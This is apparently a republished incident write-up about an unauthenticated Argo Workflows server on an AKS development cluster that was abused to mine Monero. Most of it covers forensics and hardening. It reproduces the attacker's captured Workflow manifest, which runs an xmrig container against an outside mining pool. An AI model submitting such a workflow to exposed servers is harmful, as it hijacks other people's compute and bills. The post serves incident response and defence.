How an Exposed Argo Server Turned Our AKS Cluster Into a Crypto Miner
Note: All identifiers in this post — cluster names, subscriptions, IPs, wallet addresses, and emails — have been anonymized. The technical details, timeline, and remediation steps are taken from a real incident I respond
Note: All identifiers in this post — cluster names, subscriptions, IPs, wallet addresses, and emails — have been anonymized. The technical details, timeline, and remediation steps are taken from a real incident I responded to.
A development AKS cluster that nobody was watching closely spent roughly three days mining Monero for a stranger. No data was stolen. Nothing crashed. The only reason we caught it was a routine agentless scan flagging a container image as malware. This is the full story: how the attacker got in, what the forensics showed, and the exact changes that closed the hole.
If you run Kubernetes — especially "just a POC" clusters — this is the cheapest security lesson you'll ever get.
TL;DR
- A POC AKS cluster was running Argo Workflows with an
argo-serverexposed to the public internet on port 80 with--auth-mode=server— meaning no authentication required. - An attacker scanned for it, found it, and submitted Argo
Workflowobjects runningminingcontainers/xmrig:latest, pointed at a Monero mining pool. - With no NetworkPolicy, no Pod Security Admission, and a
cluster-adminClusterRoleBinding lying around, nothing stopped it. - It mined for ~3 days on 8 vCPUs before an agentless malware scan caught the image.
- Fix = kill the entry point, then layer on AuthN, NetworkPolicy, Pod Security Standards, admission control on registries, and runtime monitoring.
The detection
The first signal came from an agentless container scanner (Prisma Cloud in our case, but Defender for Containers or Trivy-operator would catch the same thing). Two minutes after a container instance restarted, the scanner reported:
| Rule | Severity | Finding |
|---|---|---|
| Malware (WildFire) | Critical | Image flagged as malware — 4 instances |
| Crypto-mining binaries | High | Image contains known mining binaries |
| Runs as root | High | Image created without a non-root user |
The image was the giveaway:
docker.io/miningcontainers/xmrig:latest
xmrig is the most popular open-source Monero (XMR) CPU miner. When it shows up in your cluster and you didn't put it there, you've been cryptojacked.
The forensics
We stopped the cluster first (containment), then restarted it in a controlled window to collect evidence before cleaning up. Here's what we found.
1. The entry point: an unauthenticated Argo server
The cluster had been set up months earlier for an Argo CI/CD + Workflows POC. Over time, several argo-server variants had accumulated — and one of them was wide open:
kubectl get svc -n argo
NAME TYPE EXTERNAL-IP PORT(S) AUTH
argo-server-noauth LoadBalancer <public-ip> 80 --auth-mode=server <-- NO AUTH
argo-server-open LoadBalancer <public-ip> 80 --auth-mode=client
argo-server-public LoadBalancer <public-ip> 80,443 unknown
argo-server-nodeport NodePort - 30746 unknown
argo-server LoadBalancer <public-ip> 2746 default
That first one is the problem. In Argo Workflows, --auth-mode=server means the server authenticates as itself to the cluster and does not require the caller to present any credentials. Expose that behind a public LoadBalancer on port 80 and you've effectively published a "run any container you want on my cluster" API to the entire internet.
Automated scanners (Shodan, Censys, mass-scanners) find these within hours.
2. The payload: a captured malicious workflow
The attacker submitted ordinary-looking Argo Workflow objects. Here's a sanitized copy of what was actually on the cluster:
apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
generateName: besteffort-probe-
namespace: argo
labels:
workflows.argoproj.io/creator: system-serviceaccount-argo-argo-server
spec:
entrypoint: run
templates:
- name: run
container:
image: miningcontainers/xmrig:latest
args:
- "-k"
- "-o"
- "auto.c3pool.org:443" # Monero mining pool
- "-u"
- "<attacker-monero-wallet>" # payout address
- "-p"
- "AR" # worker label
Note the innocuous generateName: besteffort-probe- — it's trying to look like noise. Three of these were submitted and ran as besteffort-probe-xxxxx pods.
3. Why nothing stopped it
This is the part worth internalizing. The miner ran because every layer that should have blocked it was missing:
| Control that was missing | What it would have prevented |
|---|---|
| AuthN on Argo server | Anonymous workflow submission |
NetworkPolicy (networkPolicy: none) |
Egress to the mining pool |
| Pod Security Admission | Root/privileged containers |
| Registry admission control | Pulling docker.io/miningcontainers/*
|
| Runtime monitoring (Container Insights off) | Alerting on sustained 100% CPU |
| Least-privilege RBAC | A stray cluster-admin ClusterRoleBinding (argo-admin) gave workflows the keys to the kingdom |
Security is layered for exactly this reason. Any one of these controls would have stopped or flagged the attack. Zero of them were present.
4. The blast radius
XMRig is "just" a miner, so there was no data exfiltration. But the same unauthenticated path could have been used to:
- Read every Secret the Argo service account could reach
- Move laterally (no NetworkPolicy = flat network)
- Steal CI/CD credentials mounted into workflows
Treat cryptojacking as a signal, not the whole problem. If they could run a miner, they could run anything.
The timeline
~months prior POC cluster created; multiple argo-server deployments pile up;
argo-server-noauth exposed publicly on :80 with no auth
Day 0 13:14 Attacker submits 3 "besteffort-probe" workflows via the open Argo API
-> image: miningcontainers/xmrig:latest -> pool: auto.c3pool.org:443
Day 0 -> Day 3 XMRig mines Monero on 2x Standard_D4s_v3 (8 vCPUs) ~24/7
Day 3 04:19 Container instance restarts; agentless scan picks it up
Day 3 04:21 Scanner confirms malware (WildFire + mining binaries)
Day 3-4 Security notified -> cluster STOPPED (containment)
Day 4 Controlled restart for forensics -> eradication -> hardening
Three days of free compute on someone else's Azure bill. On a bigger or GPU-enabled cluster, that's a very expensive weekend.
Eradication
Containment first (az aks stop), then — once restarted in a controlled window — hunt and destroy:
# Hunt for the miner across all namespaces
kubectl get pods -A -o wide | grep -iE 'xmrig|mining|besteffort'
kubectl get workflows -A
kubectl get cronworkflows -A
# Delete malicious workloads and workflows
kubectl delete workflow <name> -n argo
kubectl delete pod <name> -n argo --force --grace-period=0
# Remove the entry points
kubectl delete svc argo-server-noauth argo-server-open argo-server-public -n argo
kubectl delete deploy argo-server-noauth argo-server-open -n argo
# Kill persistence: look for stray cluster-admin bindings
kubectl get clusterrolebindings | grep -v '^system:'
kubectl delete clusterrolebinding argo-admin-binding
# Purge cached malicious images from nodes
az aks update -n <cluster> -g <rg> \
--enable-image-cleaner --image-cleaner-interval-hours 24
Then rotate everything the attacker could have touched: Kubernetes Secrets, registry credentials, any Git/CI tokens mounted into workflows.
Hardening — the part that actually matters
Removing the miner is easy. Making sure it can't happen again is the job. Here's what we applied, in order of impact.
1. Never expose a workflow engine without auth
If Argo needs to be reachable, put it behind SSO and drop --auth-mode=server for public endpoints. Better: don't give it a public LoadBalancer at all — use private ingress + VPN/Entra ID.
2. NetworkPolicy: deny egress by default
The single highest-ROI control. A miner that can't reach a pool is useless.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: deny-all
namespace: argo
spec:
podSelector: {}
policyTypes: [Ingress, Egress]
---
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: allow-dns-only
namespace: argo
spec:
podSelector: {}
policyTypes: [Egress]
egress:
- ports:
- { protocol: UDP, port: 53 }
- { protocol: TCP, port: 53 }
Enable the engine at the cluster level too:
az aks update -n <cluster> -g <rg> --network-policy calico
3. Pod Security Admission: ban root/privileged
apiVersion: v1
kind: Namespace
metadata:
name: argo
labels:
pod-security.kubernetes.io/enforce: restricted
pod-security.kubernetes.io/audit: restricted
pod-security.kubernetes.io/warn: restricted
The XMRig image runs as root — restricted would have rejected it outright.
4. Admission control on registries (Gatekeeper / Azure Policy)
Only allow images from registries you trust. docker.io/miningcontainers/* should never be pullable.
apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sAllowedRepos
metadata:
name: allowed-repos
spec:
match:
kinds:
- apiGroups: [""]
kinds: ["Pod"]
parameters:
repos:
- "myregistry.azurecr.io/"
5. Turn monitoring ON
The cluster had Container Insights disabled, so nobody saw 8 vCPUs pinned at 100% for three days. Enable it and alert on sustained CPU + unexpected egress.
az aks enable-addons -n <cluster> -g <rg> --addons monitoring
az aks update -n <cluster> -g <rg> --enable-defender
6. Least privilege + identity
az aks update -n <cluster> -g <rg> \
--enable-oidc-issuer --enable-workload-identity --disable-local-accounts
Delete stray cluster-admin bindings. Workflows should run with the minimum RBAC they need, never cluster-admin.
Takeaways
- "It's just a POC" is how most breaches start. Dev clusters get the least attention and the loosest config. Attackers don't care about your environment label.
- A public endpoint + no auth = a public API to your compute. Argo, Jupyter, Ray dashboards, Kubeflow, the Kubernetes dashboard — all have been abused this exact way.
- Layered controls win. Any one of NetworkPolicy, PSA, registry admission, or monitoring would have stopped or surfaced this. Don't rely on a single gate.
- Cryptojacking is a smoke alarm. If someone can run a miner, assume they could have run anything — rotate credentials and hunt for persistence.
- You can't respond to what you can't see. Monitoring isn't optional, even in dev.
If you run Argo (or any workflow engine) on Kubernetes, go check right now:
kubectl get svc -A | grep -iE 'argo|dashboard|jupyter|ray|kubeflow'
Anything with a public EXTERNAL-IP and no auth in front of it is your next incident.
Originally published by Dev.to Security. Aggregated on AIWithGhost for educational purposes — full credit and traffic to the original publisher.